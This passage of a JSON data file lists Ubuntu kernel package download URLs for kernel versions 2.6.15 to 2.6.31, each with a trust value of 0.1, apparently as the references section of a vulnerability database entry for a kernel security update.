        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
